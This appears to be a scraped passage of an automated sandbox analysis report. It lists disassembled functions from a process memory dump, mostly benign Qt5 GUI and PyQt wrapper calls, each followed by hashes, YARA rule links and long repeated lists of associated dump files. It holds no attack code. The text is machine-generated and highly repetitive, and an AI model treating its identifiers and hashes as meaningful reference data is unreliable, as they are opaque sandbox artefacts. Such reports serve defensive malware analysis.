                                                                                                                                                                                                                                          • API ID: ?translated@Polygon@@$Point@@@malloc
                                                                                                                                                                                                                                          • String ID: BJ9$Bii$QPolygon$translated$translated(self, dx: int, dy: int) -> QPolygontranslated(self, offset: QPoint) -> QPolygon
                                                                                                                                                                                                                                          • API String ID: 3315525380-1045378559
                                                                                                                                                                                                                                          • Opcode ID: 56048af5a1eb98eb44732044b9bf2a26ad43173e37cf0660e55ad2240a688da6
                                                                                                                                                                                                                                          • Instruction ID: 810a45247d7169d723246489214c043cc867c3accbaa715f4bdaffd0cd084908
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56048af5a1eb98eb44732044b9bf2a26ad43173e37cf0660e55ad2240a688da6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E315C37A19A46C2EB108F15E8892A973A4FB88FC4F904136DA8E07324EF3CE555CB44
                                                                                                                                                                                                                                          Function 00007FF89D9B1AD0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 74COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?insertRow@QStandardItem@@QEAAXHAEBV?$QList@PEAVQStandardItem@@@@@Z.QT5GUI ref: 00007FF89D9B1B50
                                                                                                                                                                                                                                          • ?insertRow@QStandardItem@@QEAAXHPEAV1@@Z.QT5GUI ref: 00007FF89D9B1BFF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Standard$?insertItem@@Row@$Item@@@@@List@V1@@
                                                                                                                                                                                                                                          • String ID: BiJ3$BiJ:$QStandardItem$insertRow$insertRow(self, row: int, items: Iterable[QStandardItem])insertRow(self, arow: int, aitem: Optional[QStandardItem])
                                                                                                                                                                                                                                          • API String ID: 1324998375-2342085720
                                                                                                                                                                                                                                          • Opcode ID: 78bcdde13c35d34ade6d95a11ac12409132ab41da8f4522610fe512a8700e2f7
                                                                                                                                                                                                                                          • Instruction ID: b71c4439b8549b53d76f5d05bda169f878b5e434b7d1fb75acc5933fb674b546
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78bcdde13c35d34ade6d95a11ac12409132ab41da8f4522610fe512a8700e2f7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB410237A08F8682DB20CF11E8881AA73A4FB88B94F514136DA9E43724EF3DE558C744
                                                                                                                                                                                                                                          Function 00007FF89D9B2050 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 72COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?insertRows@QStandardItem@@QEAAXHH@Z.QT5GUI ref: 00007FF89D9B20BE
                                                                                                                                                                                                                                          • ?insertRows@QStandardItem@@QEAAXHAEBV?$QList@PEAVQStandardItem@@@@@Z.QT5GUI ref: 00007FF89D9B2165
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Standard$?insertItem@@Rows@$Item@@@@@List@
                                                                                                                                                                                                                                          • String ID: BiJ3$Bii$QStandardItem$insertRows$insertRows(self, row: int, count: int)insertRows(self, row: int, items: Iterable[QStandardItem])
                                                                                                                                                                                                                                          • API String ID: 2942836812-2112208841
                                                                                                                                                                                                                                          • Opcode ID: c36277484ea8555968afc27835697a77a39618c5012da645e2e09e0b5861bae6
                                                                                                                                                                                                                                          • Instruction ID: 7a352f7e90610faa1d600bdc587e9c1f619fb0b3aeb15b3ad50a415819c0f5dd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c36277484ea8555968afc27835697a77a39618c5012da645e2e09e0b5861bae6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB410577618B86C5DB208B11E8882AA73A4FB88BD4F504136DA8E03724EF3DE559CB44
                                                                                                                                                                                                                                          Function 00007FF89D987E80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 65COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setFont@QTextCharFormat@@QEAAXAEBVQFont@@@Z.QT5GUI ref: 00007FF89D987EEA
                                                                                                                                                                                                                                          • ?setFont@QTextCharFormat@@QEAAXAEBVQFont@@W4FontPropertiesInheritanceBehavior@1@@Z.QT5GUI ref: 00007FF89D987F86
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setCharFont@Format@@Text$Behavior@1@@FontFont@@Font@@@InheritanceProperties
                                                                                                                                                                                                                                          • String ID: BJ9$BJ9E$QTextCharFormat$setFont$setFont(self, font: QFont)setFont(self, font: QFont, behavior: QTextCharFormat.FontPropertiesInheritanceBehavior)
                                                                                                                                                                                                                                          • API String ID: 3105797926-1211473390
                                                                                                                                                                                                                                          • Opcode ID: a4668f7b488c87cddc3ada6f24f15cd0e06f903e4bb5c80f9076c8a07d7869ed
                                                                                                                                                                                                                                          • Instruction ID: fe71a445f83816dd3f614b4cc95fd99922478a0c3d45a9c7a447124dda8feaa8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4668f7b488c87cddc3ada6f24f15cd0e06f903e4bb5c80f9076c8a07d7869ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0331E477A09F4681EB60CB45E8842AA73A4FB88BD4F408136DACE43724EF3CE559C744
                                                                                                                                                                                                                                          Function 00007FF89D971D20 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setBrush@@Format@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: BJ1$QTextFrameFormat$setBorderBrush$setBorderBrush(self, brush: Union[QBrush, Union[QColor, Qt.GlobalColor], QGradient])
                                                                                                                                                                                                                                          • API String ID: 3306687108-1880163661
                                                                                                                                                                                                                                          • Opcode ID: 9cc11a58f7ebad3517043aae54ddd8807013e59c791dbf378d5f80e5ec970db6
                                                                                                                                                                                                                                          • Instruction ID: 4e7730ce43b23a78da39e2eabc760430e85f6638227d92a8847590936af96cf8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cc11a58f7ebad3517043aae54ddd8807013e59c791dbf378d5f80e5ec970db6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1831F877A08B8AD2DB208F15E8891AD73A4FB48B84F914132DA9E43724EF3DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D963D00 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setBrush@@Format@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: BJ1$QTextTableCellFormat$setTopBorderBrush$setTopBorderBrush(self, brush: Union[QBrush, Union[QColor, Qt.GlobalColor], QGradient])
                                                                                                                                                                                                                                          • API String ID: 3306687108-777721257
                                                                                                                                                                                                                                          • Opcode ID: ca222108a972cdf7969ea7699774dca9d7966e36fae96f634535d52fe9b00c00
                                                                                                                                                                                                                                          • Instruction ID: 85844418f93e42b1162862916d1e77b721a6cf10f926b1299689e60533a9f730
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca222108a972cdf7969ea7699774dca9d7966e36fae96f634535d52fe9b00c00
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8531F637A08B8AD2DB209F11E8891AD73B4FB48B84F914132DA9E43724EF3DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D9AA090 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setBrush@@Format@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: BJ1$QTextFormat$setForeground$setForeground(self, brush: Union[QBrush, Union[QColor, Qt.GlobalColor], QGradient])
                                                                                                                                                                                                                                          • API String ID: 3306687108-1575198602
                                                                                                                                                                                                                                          • Opcode ID: d7e73f717b8469d12a53372b786ad97307faa9c87eb0735ce0655371bbf71c74
                                                                                                                                                                                                                                          • Instruction ID: 5b50b149ce11b7f5357837eae9c0d321a79bd5a27845620935fbf1aa68146a84
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7e73f717b8469d12a53372b786ad97307faa9c87eb0735ce0655371bbf71c74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7731F837A08B8AD2DB208F11E88919E73B4FB48B84F914132DA9E43724EF3CE559C744
                                                                                                                                                                                                                                          Function 00007FF89D977F80 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@String@@@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: BJ1$QTextImageFormat$setName$setName(self, aname: Optional[str])
                                                                                                                                                                                                                                          • API String ID: 3611022156-3603350003
                                                                                                                                                                                                                                          • Opcode ID: 8ddb322891db415919c9412a804c798a3e5d4c0c6f2da91f195a70ecb7db8acf
                                                                                                                                                                                                                                          • Instruction ID: 8bd27eade7a618014bf995b2c2ba710fbbb7237218b346c5c795c13a956de849
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ddb322891db415919c9412a804c798a3e5d4c0c6f2da91f195a70ecb7db8acf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F231D637A08B86D5DB208F12E8891AA73B4FB48BD4F914032DA9E43724EF3DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D997FC0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
